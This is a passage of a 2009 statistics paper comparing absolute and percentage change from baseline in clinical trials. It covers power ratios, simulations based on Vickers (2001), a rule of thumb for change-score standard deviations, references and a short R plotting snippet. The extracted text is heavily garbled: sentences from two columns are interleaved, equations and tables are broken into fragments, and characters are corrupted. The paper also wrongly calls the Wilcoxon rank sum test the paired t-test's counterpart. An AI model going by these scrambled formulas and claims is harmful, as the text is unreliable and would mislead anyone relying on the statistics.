pressure of each patient after taking the drug capbP\nbP\ntopril. Absolute change and percentage change show the dewhere bP is an estimate of the standard deviation of percrease in di¤erent ways. From a statistical point of view, we\ncentage\nchange.\nshould compare the statistical power for the two methods.\nWe have mentioned the relation between statistical power\nand the absolute value of t-statistic. We know that, when\n2.3 Comparison of Statistical Power\nthe signi…cant level is …xed, if the expected absolute value\nof\nthe t-statistic of absolute change is larger, the statistical\nWe have mentioned that Vickers (2001) compared the statispower\nof that will be higher. The opposite is also true, i.e.\ntical power of di¤erent methods by doing a simulation. However, his conclusion just based on an ideal simulation procedure, and he did not compare the statistical power theoretically. Kaiser (1989) developed a test statistic which compared\nE bCC\nthe maximum likelihood of the two methods. It has nothing\nE (jtC j)\n>1\n(5)\nR =\n=\nto do with statistical power. But Kaiser (1989) gave an idea\nP\nE (jtP j)\nE\nb\nthat it is easier to do comparison by constructing a ratio test\nP\nstatistic.\nStatistical P ower of Absolute Change\n,\n>1\nFor comparison of the statistical power of the two methStatistical P ower of P ercentage Change\nods, we construct a ratio test statistic by using the test stawhere E (jtC j) and E (jtP j) are the expected absolute value\ntistic or p-value of the treatment e¤ect test. Before that, we\nneed to know the distributions of absolute change and per- of the t-statistic of absolute change and percentage change,\ncentage change. That is because, for di¤erent distributions of respectively.\nSo, when R > 1, absolute change has higher statistiabsolute change or percentage change, di¤erent test methods\nwill be used. In order to construct a ratio test statistic, we cal power than percentage change, and we choose absolute\nshould know the test statistics used in both numerator and change. If R < 1, the percentage change with the higher\nstatistical power is preferred.\ndenominator of the ratio test statistic.\nIn the case of small sample size, it is common to assume\nthat one of the distributions of absolute change and percent2.3.1 When t-test is Suitable for both Absolute\nage change is normal. In some speci…c situation, both abChange and Percentage Change\nsolute change and percentage change may be normally disWhen the sample size n of the clinical experiment is large, tributed. Even though for a dataset that is not normally disaccording to the Central Limit Theorem, both the mean of tributed, if the distribution is close to normal distribution or\n3 Hand, DJ, Daly, F, Lunn, AD, McConway, KJ and Ostrowski, E (1994): A Handbook of Small Data Sets. London: Chapman and Hall.\nDataset 72\nZhang, L. and Han, K. (2009)\n3/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nthe distribution is symmetric without extreme observations,\nt-test may also be used. In that situation, the test statistic R\nis also applicable.\nIf we simulate some datasets, by using the ratio test statistic R, we can compare the statistical power of the absolute\nchange and percentage change of the datasets that we simulated. In contrast with Vickers’(2001) claim, some datasets\nwith R < 1 will be shown, which re‡ects that percentage\nchange has higher statistical power than absolute change under some conditions. In the simulation section, we will talk\nmore about the comparison of the statistical power of the two\nmethods.\n2.3.2 When the t-test is not suitable for At Least One\nTest\nFor the cases when the assumptions for the t-test are not\nsatis…ed for at least one of the tests, another test should be\nconsidered. Wilcoxon rank sum test4 is an alternative method\nproposed by Wilcoxon (1945). Bonate (2000) mentioned that\nit is the non-parametric counterpart to the paired samples\nt-test and should be used when normal assumptions are violated. He suggested that the Wilcoxon rank sum test is always\na better choice when the distribution of the data is unknown\nor uncertain. Therefore, when the paired samples t-test does\nnot work, we choose Wilcoxon rank sum test instead.\nSince we can not use t-statistic to construct the ratio test\nstatistic any more, we may choose to use the expected p-value\nof the treatment e¤ect test.\nSimilarly to (5), according to what is mentioned in equation (2), we may construct another ratio test statistic R0 by\ntaking the ratio of expected p-value, i.e.\nstatistical power than percentage change, and we choose absolute change. For R0 > 1, the percentage change is preferred.\nIn this section, another ratio test statistic R0 for nonnormal distribution situation is discussed. This is the supplement of the normal distribution case. In the following simulation part, we will concentrate more on the normal distribution\ncase shown in subsection 2.3.1, and the details in subsection\n2.3.2 will not be discussed any more.\n3. Rule of Thumb for the Standard\nDeviation of Change Scores\nT\nhe standard deviation of the treatment e¤ect is an important parameter that is of interest in the planning of\nstudies. The standard deviation of the change scores is the\nfocus in the second section of this essay. For the case when\nt-test may be used instead of a non-parametric test, in order to calculate the ratio test statistic R, we should work out\nboth the mean and the standard deviation of absolute change\nand percentage change …rst. It is easy to get these values in\ncase the datasets of the experiment which give the baseline\nand follow-up scores for each patient are known. However, in\nclinical research, it is not always possible and practical to get\nthe scores for each patient, especially in the planning phase of\na study. If we require some datasets to support our research\nwork, we may …nd some experiment datasets interesting for\nour research from experiments that someone else has done.\nOne of the good ways to …nd the datasets is searching from\npublished clinical articles. Most of the time, we may …nd some\nexamples in these articles which show us the summary of the\nE (pC )\n<1\n(6) baseline scores, the follow-up scores, and their standard deviR0 =\nE (pP )\nations. And we may get relevant datasets from these tables.\nStatistical P ower of Absolute Change\n,\n>1\nHowever, the scores for each patient in these clinical research\nStatistical P ower of P ercentage Change\narticles are seldom published. In this case, how can we know\nwhere E (pC ) and E (pP ) are the expected p-value of ab- the standard deviation of the change scores?\nThere is a rule of thumb which describes the relationship\nsolute change and percentage change, respectively.\nFor the cases that t-test still works, E (pC ) = E (ptC ) between the standard deviation of the change scores and that\nand E (pP ) = E (ptP ), where E (ptC ) and E (ptP ) are the ex- of the baseline scores.\npected p-value of the t-test for absolute change and percentage\nSD (B)\nchange, respectively. When Wilcoxon rank sum test is used\np\n(7)\nSD (C)\n2\ninstead of t-test, E (pC ) = E (pC W ilcoxon ) and E (pP ) =\nE (pP W ilcoxon ). E (pC W ilcoxon ) and E (pP W ilcoxon ) are\nthe expected p-value of the Wilcoxon rank sum test for ab- 3.1 Theoretical Derivation of the Rule of\nsolute change and percentage change, respectively. Therefore, Thumb for Absolute Change\nwe may get three di¤erent alternative forms for the ratio test\nThe general expression for the rule of thumb of absolute\nstatistic R0 .\nchange is\nWe have talked about that the smaller the expected pvalue is, the higher the statistical power will be. When the sigSD (B)\nSD (C) =\n(8)\nni…cant level is …xed, if R0 < 1, absolute change has higher\nk\n4 Wilcoxon\nrank sum test is a non-parametric test for assessing whether two independent samples of observations come from the same distribution.\nZhang, L. and Han, K. (2009)\n4/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\np\nV ar (B) V ar (F )(10)\np\n= V ar (B) + mV ar (B) 2r V ar (B) mV ar (B)\np\n= (1 + m) V ar (B) 2r mV ar (B)\np\n= 1 + m 2r m V ar (B)\n= V ar (B) + V ar (F )\np\n2\n2rSD (B)\n1.2\n1.0\n0.0\n0.2\n0.4\n0.6\n0.8\n1.0\nCorrelation Coefficient r\nFigure 1. Relation curve between the standard deviation of\nabsolute change SD (C) and the correlation coe¢ cient r\nwhen SD (B) = 1.\nTherefore, when r\n0:75, the\np empirical form of the rule\nof thumb SD (C)\nSD (B)\n2 holds. If the correlation\ncoe¢ cient r changes to another value, the form of the rule\nof thumb will be also changed. When r tends to 1, a little\nchange in r may result in a signi…cant change in the standard\ndeviation of absolute change.\n(12)\nTherefore, the standard deviation of the absolute change\nis connected to the standard deviation of the baseline scores\nvia the correlation coe¢ cient r.\n3.2 The Relation between the Standard Deviation of Absolute Change and the Correlation\nCoe¢ cient\nThe empirical formpof the rule p\nof thumb is shown in expression\n2 2r\n2, we get r 0:75. Equation\n(7). From k = 1\n(12) shows the relation between the standard deviation of the\nabsolute change and that of the baseline scores. So, how does\nthe standard deviation of absolute change depend on the correlation coe¢ cient?\nZhang, L. and Han, K. (2009)\n0.8\n2r\nEquivalently, from equation (10), we get the relation equation (11).\nq\np\nSD (C) = 1 + m 2r mSD (B)\n(11)\np\np\n1 + m 2r m, which\nThus, in equation (8), k = 1\nshows that the rule of thumb is determined by the correlation\ncoe¢ cient r and the ratio m.\nWhen the baseline and follow-up p\nscores have the same\nvariance, m = 1, then we get k = 1\n2 2r. And the expression of the rule of thumb becomes\nSD (C) =\n(0.75,sqrt(2)/2)\n0.2\nV ar (C)\nSD(C)\n= V ar (B) + V ar (F )\np\nwhere r = cov (B; F )\nV ar (B) V ar (F ) is the correlation coe¢ cient between baseline and follow-up scores.\nWe assume that V ar (F ) = mV ar (B), where m is the\nratio of the variance of follow-up scores to that of baseline\nscores. In a speci…c case, m is a constant which may be calculated from the known dataset. Then, equation (9) can be\nrewritten as\n1.4\n(9)\n2cov (B; F )\np\n2r V ar (B) V ar (F )\n0.4\n= V ar (B F )\n= V ar (B) + V ar (F )\n0.0\nV ar (C)\np If we assume that SD (B) = 1, then we get SD (C) =\n2 2r. The smooth curve in Figure 1 shows the relationship between the standard deviation of the absolute change\nSD (C) and the correlation coe¢ cient r. We see that SD (C)\ndecreases from 1:4 to 0 as the correlation coe¢ cient increases\nfrom 0 to 1. When r 6 0:8, SD (C) roughly has a linear decrease. After that, when the correlation coe¢ cient r tends to\n1, the ratio decreases quickly to 0.\n0.6\nwhere k is a constant that should be determined; SD (C)\nand SD (B) are the standard deviation of absolute change\nand baseline scores, respectively.\nThe relationship between the standard deviation of absolute change scores and that of the baseline scores can be\nderived from properties of the variance of C,\n3.3 Rule of Thumb for Percentage Change\nEarlier we stated that P = (B F ) B = C B, i.e. percentage change is the ratio of absolute change to the baseline\nscore. Then we get\nSD (P ) = SD\nB\nF\nB\n= SD\nC\nB\nSince percentage change is a ratio of two variables, its distribution is uncertain. It is hard to derive the expression of\nthe standard deviation of percentage change from the standard deviation of baseline scores as we did in equation (10).\nWe have discussed the rule of thumb for SD (C), and we\nsee that the standard deviation of percentage change depends\n5/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nnot only on the absolute change C but also on the baseline\nscore B. If we …x the value of C, B may also keep on changing\nfrom one sample to another. As a result, it seems there is no\nstable relationship between the standard deviation of percentage change SD (P ) and the baseline score B. A rule of thumb\nfor percentage change may, therefore, not be stated. This conclusion will be proved in the following simulation part.\nthe patients in the treatment group, the …nal follow-up scores\nF all have an absolute decrease of 5 units from F 0 after the\nmedical intervention, while there is no change of the follow-up\nscores for patients in the control group, i.e.\nF =\nF0\nF0\n5 if\nif\ng=1\ng=0\nHe changed the correlation coe¢ cient r, and got di¤erent\nsimulation results under di¤erent correlation coe¢ cient. Using these simulation results, he calculated statistical power for\neach method and made the statistical ine¢ ciency conclusion.\n4. Simulation\nIn the following subsections, we will do simulations based\non Vickers’ (2001) method. But some change and improven section 2, we discussed the comparison of the statistical ment will be done to his code.\npower of absolute change and percentage change, by constructing a ratio test statistic based on normal distribution.\nIn the third section, we discussed the rule of thumb for ab- 4.1.1 A Case that Percentage Change Has Higher Statistical Power\nsolute change and percentage change theoretically.\nThis section will do some simulations to show the problems that we have discussed in a practical way. The …rst In Vickers’(2001) simulation method, a0 …xed absolute change\nthing we want to prove is, in contrast with Vickers’ (2001) from the simulated follow-up scores F to the …nal follow-up\nconclusion, that percentage change can be statistically e¢ - scores F was set to each patient in the treatment group. If we\ncient under some conditions. The second thing that will be change the …xed absolute change to a …xed percentage change,\nproved is the di¢ culty of de…ning a rule of thumb for percent- maybe we will get something di¤erent. To be more randomized, just like what may happen in practice, we use a random\nage change.\npercentage change instead of …xed percentage change. The\npercentage changes P are simulated from a normal distribu4.1 Statistical E¢ ciency of Percentage tion. We should notice that the changes we did to Vickers’\nChange under Some Conditions\n(2001) simulation will result in the change of the correlation\ncoe¢ cient between the baseline and follow-up scores. The corVickers (2001) suggested avoiding using percentage change,\nrelation coe¢ cient of the baseline and follow-up scores in the\nbecause of his conclusion that percentage change from basesimulation result is not the r that we used in equation (13) any\nline is statistically ine¢ cient. He made that conclusion based\nmore, even though the real value of the correlation coe¢ cient\non the comparison of statistical power calculated from his\nmay be very close to the value we used in the simulation.\nsimulation results.\nHowever, since the correlation coe¢ cient will not a¤ect the\nVickers (2001) did the simulation in the following way.\ncomparison of the statistical power for the two methods, we\nFirst, he simulated 100 pairs of baseline and follow up scores\nwill give the value of used in each simulation procedure, but\nfor 100 patients. The baseline scores B are simulated from\ndo not talk more about it. What’s more, in the following sima normal distribution, i.e. B\nN (50; 10). In order to get\nulation, we just concentrate on the patients in the treatment\n100 scores B, he simulated 100 B 0 …rst, B 0 N (0; 10), then\ngroup.\nhe got B from the equation B = B 0 + 50. He also simuWe have developed a ratio test statistic R in section 2, and\nlated another 100 scores Y , Y\nN (0; 10), which are de…ned\nwe will use it to do the comparison between absolute change\nas the post-treatment scores of the control group. Then the\nand percentage change. The simulation can be divided into\nfollow-up scores F 0 are simulated from B 0 and Y by using\ntwo steps. In step 1, we simulate 100 pairs of baseline/follow0\nthe equation (13). We should note that F is not the …nal\nup scores. In the second step, the test statistic R is calculated\nfollow-up scores.\nbased on the scores we simulated in step 1.\np\nFrom equation (5), we know that, in order to simulate\n0\n0\n2\nF =B r+Y\n1 r + 50\n(13)\na dataset such that R < 1, we should let the percentage\nFrom B 0\nN (0; 10) and Y\nN (0; 10), we obtain that change have a large mean and small standard deviation. So,\nF N (50; 10). Finally, Vickers (2001) simulated 100 g from in this case, we simulate P from the normal distribution\nBinomial (1; 0:5) for each patient. These patients who got N (0:5; 0:01). We set r = 0:75 and simulate B from the disg = 1 were put into the treatment group, and the other pa- tribution N (200; 20). According to Vickers (2001) simulation\ntients were put in the control group. So, there are nearly method, we obtain a dataset of scores. Figure 2 shows a part\n50 patients in both treatment group and control group. For of the simulation results of baseline and follow-up scores in\nI\nZhang, L. and Han, K. (2009)\n6/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nIn order to show a more general result, we repeat the procedure in both step 1 and step 2 100 times, and check the\ndistribution of R. As shown in Figure 3, the solid line on the\nleft is the distribution of R based on the datasets we simulated. We see that, when P N (0:5; 0:01), the value of R is\nmuch less than 1. As a result, in this case, percentage change\nhas a higher statistical power.\nIn this simulation, we set the percentage change P normally distributed with a large mean and small standard deviation. However, it is unreasonable to have such a small\nstandard deviation in practice. If we increase the standard\ndeviation of P , what kind of result will come to us?\nFigure 3 shows the distribution of R under di¤erent standard deviation of P . We see that, the value of the test statistic R increases as the standard deviation of P increases.\nAlthough R increases, it is still less than 1. In this case, we\nprefer percentage change to absolute change.\n100\n150\n200\nstep 1. From Figure 2, we see that there is a nearly 50%\ndecrease from the baseline score for each patient.\nBaseline\n4.1.2 A Case that Absolute Change Has A Little\nHigher Statistical Power\nFollow-up\nB~N(200,20), P~N(0.5,0.01)\n200\nFigure 2. Change from Baseline Scores to Follow-up Scores\n(r = 0:75).\n100\n200\n150\nSD(P)=0.01\nSD(P)=0.05\nSD(P)=0.1\nSD(P)=0.2\n0.5\n0.6\n0.7\n0.8\n0.9\n1.0\n100\n0\n150\n50\nDensity\nIn the last section, we simulated a case where percentage\nchange had a higher statistical power, which is in contrast\nwith Vickers’ (2001) conclusion. If we consider more about\nthe simulation method, we should notice that we used percentage change to do simulation in that case. It may be a\nfactor which a¤ects the simulation results such that percentage change has a higher statistical power.\nB~N(200,20), P~N(0.5,SD(P))\nFigure 3. Distribution of R (r\n= 0:75).\nBaseline\nFollow-up\nB~N(200,20), C~N(100,5)\nSince the test statistic R is the ratio of two expected values, in order to calculate the expected value, we repeat the\nscore simulation procedure in step 1 100 times, and then we\nget 100 datasets of scores. In the second step, using the 100\ndatasets, we work out the value of R, and check if it is less\nthan 1.\nZhang, L. and Han, K. (2009)\nFigure 4. Change from Baseline Scores to Follow-up Scores\n(r\n= 0:75).\nNow, we just change P N (0:5; 0:01) to C N (100; 5),\nand keep other conditions the same. Part of the baseline and\n7/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\n200\nfollow-up scores are shown in Figure 4. It seems similar with\nthe scores in Figure 2. This is because we set the expected\nabsolute change to 100, which is 50% of baseline scores. So,\nin a similar absolute change case, what kind of result we will\nget?\n100\n50\n0\nSD(C)=5\nSD(C)=10\nSD(C)=20\nSD(C)=40\n100\nDensity\n150\nDensity\n150\nSD(B)=20,Mean(C)=100\nSD(B)=10,Mean(C)=100\nSD(B)=10,Mean(C)=50\n0.98\n0.99\n1.00\n1.01\n1.02\n1.03\n50\nB~N(200,SD(B)), C~N(Mean(C),10)\n0\nFigure 6. Distribution of R (r\n0.99\n1.00\n1.01\n1.02\n1.03\n1.04\nB~N(200,20), P~N(100,SD(C))\nFigure 5. Distribution of R (r\n= 0:75).\nFigure 5 shows the distribution of R under di¤erent standard deviation of C. Comparing with the distributions in\nFigure 3, we …nd it has a di¤erent kind of change when the\nstandard deviation of C changes. The distributions in Figure\n3 mainly perform a location di¤erence, while the distributions\nin Figure 5 have di¤erent kurtosis and spread.\nEven though the expected value of R in Figure 5 is larger\nthan 1, it is really close to 1. In this case, it seems both\nabsolute change and percentage change can be used. The difference between the statistical powers of the two methods is\nvery small.\n= 0:75).\nWe have done 3 simulations based on a modi…cation of\nVickers’(2001) method so far. The …rst one shows that percentage change has higher statistical power. The other two\nshow that percentage has nearly the same statistical power\nwith absolute change. All of them proved that percentage change can be statistical e¢ cient under some conditions.\nTherefore, Vickers (2001) conclusion is not correct.\n4.2 Nonexistence of Rule of Thumb for Percentage Change\nWe have discussed the rule of thumb for percentage change\ntheoretically in section 3. In this section we will simulate\nanother dataset to check if the rule of thumb for percentage\nchange exists. The simulation will show how the standard deviation of percentage change SD (P ) depends on the baseline\nscores B.\nThis simulation is also based on Vickers’ (2001) simulation method. In this case, the baseline scores follows\nB N (50; 10), and the percentage change has a distribution\nP\nN (0:1; 0:02). Following the simulation steps, we will\nget\na\nscore dataset, and the standard deviations of absolute\n4.1.3 Another Case that Percentage Change Has Litchange\nand percentage change can be calculated.\ntle Di¤erence with Absolute Change\nAfter we get the baseline and follow-up scores, we make a\nIn this case, we reduce the standard deviation of the baseline simple transformation that both baseline and follow-up scores\nscores to 10 and compare the results with that of the previous decrease 5 units, i.e.\ncase.\ne=B 5\nB\nFrom Figure 6, we …nd that the expected value of the ratio\ne\nF =F 5\ntest statistic is much more close to 1. If we also reduce the\nmean of C, then R is completely less than 1. This is another\nAfter transformation, we get a new dataset of baseline and\ncase that shows, under some conditions, the statistical powers follow-up scores, and calculate the standard deviations of absolute change and percentage change of new scores. Repeat\nof the two methods are nearly the same.\nZhang, L. and Han, K. (2009)\n8/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\n8\n2\n4\n6\nSD(C)\n10\n12\n14\nthe simulation procedure 100 times, each time we may get standard deviation of absolute change does not change. Ace , SD (P ), SD Pe . tually, we can prove that in a theoretical way.\n4 standard deviations, SD (C), SD C\nThen, we calculate the mean of 100 simulation results for the\ne=B\ne Fe = (B 5) (F 5) = B F = C\nC\n4 standard deviations, respectively. When the correlation coe¢ cient changes, we get the relation curve between the stanAfter the transformation, C does not change. Therefore,\ndard deviation of change scores and the correlation coe¢ cient\nthe standard deviation of absolute change will not change,\nboth before and after transformation.\nneither.\nFrom …gure 7, we also see that, the standard deviations of\npercentage change under di¤erent correlation coe¢ cients become larger after transformation. The smaller the correlation\ncoe¢ cient is, the larger the change of the standard deviation\nof percentage change will be.\nWe have mentioned that SD (P ) = SD (C B). In this\ncase, C does not change, but B becomes smaller. As a result,\nthe standard deviation of percentage change becomes larger.\nThis re‡ects that the standard deviation of percentage change\ndepends on the baseline scores. Therefore, it’s di¢ cult to have\nBefore T ransformation\nAfter T ransformation\na rule of thumb for the standard deviation of the percentage\nchange based on only the standard deviation of the baseline\nscores.\n0.0\n0.2\n0.4\n0.6\n0.8\n1.0\nCorrelation Coefficient r\nB~N(50,10), P~N(0.1,0.02)\n0.30\n5. Demonstration of the Rule of\nThumb for Absolute Change\n0.15\nBefore T ransformation\nAfter T ransformation\n0.05\n0.10\nSD(P)\n0.20\n0.25\nW\n0.0\n0.2\n0.4\n0.6\n0.8\n1.0\nCorrelation Coefficient r\nB~N(50,10), P~N(0.1,0.02)\nFigure 7. Relation curve between the standard deviation of\nabsolute change (above) or percentage change (below) and\nthe correlation coe¢ cient r before and after transformation.\nFrom …gure 7, we observe that, after transformation, the\nZhang, L. and Han, K. (2009)\ne have discussed the rule of thumb for absolute change\ntheoretically in the third section of this essay. A general expression of the rule of thumb is given in equation (12).\nWe know that, when r 0:75, the empirical form of the rule of\nthumb in expression (7) holds. In this section, we will concentrate on the demonstration of the rule of thumb for absolute\nchange. We collect some real datasets to check whether the\nrule of thumb works well.\nThe real datasets are searched from examples of clinical\nresearch articles and medical literatures. As shown in Table\n2, we have collected two kinds of datasets. The datasets of\nthe …rst 10 cases contain the scores for each patient, while the\ndata sets of the last 5 cases just contain some data summary,\ne.g. mean, standard deviation, etc., of the baseline scores and\nabsolute change scores.\nIf we know the scores for each patient, we can calculate\nnot only the standard deviations but also the correlation coe¢ cient between the baseline scores and the follow-up scores.\nSo, for the …rst 10 cases, we also get the value for the general\nform of the rule of thumb.\n9/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nTable 2. Comparison of the real standard deviation and the\np value\np got from the rule of thumb for absolute change\nCase SD (B) SD (F ) SD (C) SD (B)\n2\n2 2rSD (B)\nr\nm\n15\n11.43\n8.43\n8.99\n8.09\n9.86\n0.63 0.54\n26\n12.29\n6.94\n7.91\n8.69\n7.76\n0.8\n0.32\n37\n5.59\n5.14\n2.54\n3.95\n2.61\n0.89 0.84\n48\n4.79\n4.86\n2.68\n3.39\n2.66\n0.85 1.03\n59\n6.32\n13.32\n13.76\n4.47\n8.15\n0.17 4.45\n610\n20.57\n20\n9.03\n14.54\n9.14\n0.9\n0.95\n711\n13.19\n19.02\n17.26\n9.33\n13.54\n0.47 2.08\n812\n15.61\n18.3\n7.98\n11.04\n6.94\n0.9\n1.37\n913\n21.85\n24.13\n27.05\n15.45\n25.65\n0.31 1.22\n1014\n4.27\n4.39\n3.78\n3.02\n3.72\n0.62 1.06\n1115\n0.93\n0.37\n0.66\n1216\n12.5\n3.8\n8.84\n1317\n18.3\n6.3\n12.94\n1418\n18\n10\n12.73\n1519\n16\n15\n11.31\np\nComparing the values of SD (C) and SD (B)\n2, there 4,\n1. In this case, SD (C) = 2:68 and\np m = 1:03\nare obvious di¤erences between the two values for these real\n2 2rSD (B) = 2:66, the two values are nearly the same,\ndatasets. p\nIn some cases, the di¤erence between SD (C) and which re‡ect that the rule of thumb are also a¤ected by the\nSD (B)\nratio m = V ar (F ) V ar (B).\n2 is very large.\nIf we also take m into account, we will get the real value of\nFor the cases that has a correlation coe¢ cient between 0.6\nand 0.9, whichp\nis close to 0.75, the di¤erence between SD (C) the standard deviation of absolute change. Actually, we have\nand SD (B)\n2 may be acceptable. For example, in case 1, proved that in equation (11) of section 3.\nr = 0:63, it\nis\nclose\nto 0.75. In this case, SD (C) = 8:99 and\nWhen we know nothing about the correlation between the\np\nSD (B)\n2 = 8:09 , it seems that the two values are close baseline and follow-up scores, just like the last …ve cases in\nto each other. However, in case 5, when r = 0:17, the value\nTable 2, the rule of thumb may not be suitable. In this case,\np\nof SD (C) is nearly three times of the value of SD (B)\n2. we should be more careful.\nThis is not acceptable. These facts show that the rule of\nFrom the analysis based on real datasets in this section,\nthumb in expression (7) is valid when r 0:75 or when r is we learned that when the ratio m = V ar (F ) V ar (B) tends\nclose to that value.\nto 1 and the correlation coe¢\np cient is nearly 0.75, the rule of\n2 will be practical. If these conIf we take the correlation coe¢ cientpr into account, by thumb SD (C) SD (B)\ncomparing the values p\nof SD (C) and 2 2rSD (B), we ditions are not satis…ed, it is not a good rule to follow. If we\n…nd that the values\np of 2 2rSD (B) are closer to SD (C) ignore the two conditions and insist on using the rule, as we\nthan SD (B)\n2, especially when m\n1. Look at case know from Table 2, it may result in a big mistake.\n5 Douglas\nG.Alman (1991): Practical Statistics for Medical Research. London: Chapman and Hall. Page 475\nG.Alman (1991): Practical Statistics for Medical Research. London: Chapman and Hall. Page 475\n7 Pagano M, Gauvreau K (2000): Principles of Biostatistics, Second Edition, Duxbury. Table B.15\n8 Pagano M, Gauvreau K (2000): Principles of Biostatistics, Second Edition, Duxbury. Table B.15\n9 Bradstreet, T.E. (1994) \"Favorite Data Sets from Early Phases of Drug Research - Part 3.\" Proceedings of the Section on Statistical Education\nof the American Statistical Association. <http://www.math.iup.edu/~tshort/Bradstreet/part3/part3-table3.html> 2009-06-08\n1 0 Hand, DJ, Daly, F, Lunn, AD, McConway, KJ and Ostrowski, E (1994): A Handbook of Small Data Sets. London: Chapman and Hall.\nDataset 72\n1 1 Ryan, Joiner, Cryer (1985): Minitab Handbook, Second Edition. PWS-KENT Publishing Company. Page 318, Pulse Data\n1 2 Bonate P (2000): Analysis of Pretest-Posttest Design. Boca Raton: Chapman and Hall/CRC. Table 3.1\n1 3 Bonate P (2000): Analysis of Pretest-Posttest Design. Boca Raton: Chapman and Hall/CRC. Table 3.4\n1 4 Bonate P (2000): Analysis of Pretest-Posttest Design. Boca Raton: Chapman and Hall/CRC. Table 9.1\n1 5 Waleekhachonloet O, Limwattananon C, Limwattananon S, Gross C (2007): Group behavior therapy versus individual behavior therapy for\nhealthy dieting and weight control management in overweight and obese women living in rural community. Obesity Research & Clinical Practice,\n1: 223-232. Table 3\n1 6 Neovius M, Rössner S (2007): Results from a randomized controlled trial comparing two low-calorie diet formulae. Obesity Research & Clinical\nPractice, 1: 165-171. Table 1 & Table 2\n1 7 Neovius M, Rössner S (2007): Results from a randomized controlled trial comparing two low-calorie diet formulae. Obesity Research & Clinical\nPractice, 1: 165-171. Table 1 & Table 2\n1 8 Neovius M, Rössner S (2007): Results from a randomized controlled trial comparing two low-calorie diet formulae. Obesity Research & Clinical\nPractice, 1: 165-171. Table 1 & Table 2\n1 9 Neovius M, Rössner S (2007): Results from a randomized controlled trial comparing two low-calorie diet formulae. Obesity Research & Clinical\nPractice, 1: 165-171. Table 1 & Table 2\n6 Douglas\nZhang, L. and Han, K. (2009)\n10/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nin more detail. It has higher statistical power than the two\nmethods we talked about. But for the people who are not\n6. Discussion and Conclusions\nstatisticians, this method can not be understood as easily as\nabsolute change or percentage change.\nn this essay we compared the use of absolute change and\nFrom a clinical point of view, clinicians may prefer to\npercentage change. According to the de…nition of statis- choose the method that will show the health-improvement\ntical power, we developed a ratio test statistic R under cer- more obviously. Some researchers may choose the method\ntain distribution assumption, which can help us decide which that may be understood by most people that are interested\nmethod will be used, absolute change or percentage change. in his research. Sometimes, we may make a choice just based\nWhen R > 1, absolute change has a higher statistical power. on some empirical information. Most of the time, the choice\nIn that case, we prefer absolute change to percentage change. depends more on the research work and the researcher’s own\nIf R < 1, we choose percentage change.\nexperience.\nBased on Vickers’(2001) simulation method, with the help\nof the ratio test statistic, we did some simulations to compare the statistical power of the two methods. In contrast\nwith Vickers’ (2001) conclusion that the percentage change\nReferences\nis statistical ine¢ cient, we simulated some datasets in which\npercentage change has higher statistical power, or has nearly\nBonate P. (2000): Analysis of Pretest-Posttest Design.\nthe same statistical power with absolute change. In this way,\nBoca Raton: Chapman and Hall/CRC.\nwe showed that percentage can be statistical e¢ cient under\nsome conditions.\nKaiser L. (1989): Adjusting for baseline: change or\nAnother issue often concerned by researchers is the stanpercentage change? Statistics in Medicine, 10: 1183dard deviation of change scores. There is a rule of thumb\n1190.\nthat may help us get the standard deviation of change scores\nquickly from the standard deviation of the baseline scores.\nKim M. et al. (2009): Comparison of epicardial, abThe general form of the rule of thumb for absolute change can\ndominal and regional fat compartments in response to\nbe derived in a theoretical way. From the derivation in section\nweight loss. Nutr Metab Cardiovasc Dis, 1:7. doi:\n3, we know that, when the ratio m = V ar (F ) V ar (B) 1\n10.1016/j.numecd.2009.01.010.\nand r\n0:75, the p\nempirical form of the rule of thumb\nLavange L., Engels J. and Accurso F. (2007): An2 holds. We also checked these conSD (C)\nSD (B)\nalyzing percent change in cystic …brosis clinical trials.\nditions in a practical way by collecting some real data to\nThe 21st Annual North American Cystic Fibrosis Concompare the real value and the value got from the rule of\nference, Anaheim, California.\nthumb. And we got the same conclusion. So, if we know\nnothing about the correlation between baseline and follow-up\nNeovius M. and Rössner S. (2007): Results from a\nscores, we should be more careful to use the rule.\nrandomized controlled trial comparing two low-calorie\nFor percentage change, a rule of thumb does not exist.\ndiet formulae. Obesity Research & Clinical Practice, 1:\nThat is because the standard deviation of percentage change\n165-171.\ndepends on the baseline scores, and it is very hazardous to\nTörnqvist L., Vartia P. and Vartia Y. (1985): How\nstate a rule. We also proved this by doing a simulation with\nshould relative changes be measured? American Statisa simple transformation. The simulation result showed how\ntician, 39: 43-46.\nthe standard deviation of percentage change depends on the\nbaseline scores.\nVickers A. (2001): The use of percentage change from\nIn this essay, we didn’t give any rules to make a choice\nbaseline as an outcome in a controlled trial is statisbetween absolute change and percentage change. We develtically ine¢ cient: a simulation study. BMC Medical\noped a ratio test statistic which may be helpful, but it is not a\nResearch Methodology, 1:6.\ngood rule to tell us how to make a choice. That is because, in\nWaleekhachonloet O., Limwattananon C.,\nthe ratio test statistic, expected value should be used. For a\nLimwattananon S. and Gross C. (2007): Group\nspeci…c dataset in practice, we can not calculate the expected\nbehavior therapy versus individual behavior therapy\nvalue. That is the limitation of the test statistic.\nfor healthy dieting and weight control management in\nActually, there is not a most optimal method to tell us\noverweight and obese women living in rural community.\nwhich method to choose. From a statistical point of view,\nObesity Research & Clinical Practice, 1: 223-232.\nwe would like to choose the method with higher statistical\npower. Beside the two change measurement methods from\nWilcoxon F. (1945): Individual comparisons by rankbaseline, there are also some other methods. One of them\ning methods, Biometrics Bull., 1, 80.\nis analysis of covariance, which is mentioned by both Vickers (2001) and Kaiser (1989). Bonate (2000) discussed this\nZhang, L. and Han, K. (2009)\n11/17\nI\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nAppendix\nR Code 20\nFigure 1\nr<-SDC<-NULL\nfor(i in 1:501){\nr[i]<-0.002*(i-1)\nSDC[i]<-sqrt(2*(1-r[i]))\n}\nplot(r,SDC,xlab=\"Correlation Coefficient r\",ylab=\"SD(C)\",type=\"l\")\npoints(0.75,sqrt(2*(1-0.75)),pch=20,col=2)\nlegend(0.1,0.7,\"(0.75,sqrt(2)/2)\",pch=20,col=2,bty=\"n\")\nFigure 